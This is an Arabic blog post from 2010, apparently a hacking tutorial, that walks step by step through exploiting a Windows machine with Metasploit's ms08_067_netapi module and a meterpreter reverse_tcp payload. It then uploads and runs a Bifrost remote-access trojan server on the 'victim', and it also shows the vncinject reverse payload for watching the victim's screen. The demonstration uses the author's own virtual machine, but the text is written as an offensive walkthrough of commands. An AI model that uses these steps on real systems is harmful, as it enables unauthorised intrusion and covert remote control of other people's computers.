jeudi 25 février 2010

تحديث الصفحة الإختراق القاتل metasploit+bifrost معا

وأنا أفكر طرأت لي فكرة لا أعرف إن كانت طرحت بعد المهم هي إختراق الضحية بالميتا ورفع سيرفر بيفروست وكما سأتحدث عن سيطرة الجهاز بإستخدام playoad windows/vncinject
وسأجربها علي جهاز إفتراضي كفانا من الكلام ولنبدأ.

من يرد التجربة علي جهازه فليقم بتحميل vbox أو ليقرأ موضوعي السابق علي هذا الرابط
والشرح سيكون بالصور
الشرح بالفيديو



This image has been resized. Click this bar to view the full image. The original image is sized 808x434.


إضغط علي window وبعد ذلك علي console ستفتح لنا النافذة التالية نكتب show exploits





ونختار windows/smb/ms08_067_netapi

show payloads



ونختار windows/meterpreter/reverse_tcp

أو نختارها مباشرة كما ف الصورة

This image has been resized. Click this bar to view the full image. The original image is sized 519x412.


والآن نقوم بتحديد IP الضحية وهو في هذه الحالة جهازي الإفتراضي RHOST = 192.168.56.101
ولا تنسي أن تضع قم جهازك LHOST =192.168.56.1 لتطبيق الثغرة نكتب exploit وبعد ذلك enter

This image has been resized. Click this bar to view the full image. The original image is sized 600x450.


كما ترون في الصورة لقد نجحنا في تطبيق الثغرة والدخول لي الجهاز عن طريق port 445

************************************************** **********************

لنري خيارات نكتب help والآن سنقوم برفع السيرفر بالأمر upload -r server.exe c:\
كما في الصورة التالية ولكن قبل تحميل السيرفر يجب نسخه في مجلد
C:\Program Files\****sploit\Framework3



************************************************** ***********************
بعد رفع السيرفر نشغل برنامج الدوس للضحية بالأوامرالتالية:
use -m process
execute -f cmd.exe -c
interact 3
كما في الصورة حسب رقم channel أو session المفتوح

Click this bar to view the full image.


لتشغيل السيرفر start server.exe

************************************************** ************************

وكما توضح الصورة نجاح تحميل السيرفر

This image has been resized. Click this bar to view the full image. The original image is sized 600x450.


والصور تعبر عن نفسها



شاشة الضحية



************************************************** ************************

لتطبيق payload windows/vncinject نقوم بنفس الخطوات السابقة ولكن بإستبدال
payload windows/meterpreter/reverse_tcp
set payload windows/vncinject/reverse_tcp

بتطبيق الثغرة ستفتح لنا الشاشة التالية







التوقيع

Aucun commentaire:

Enregistrer un commentaire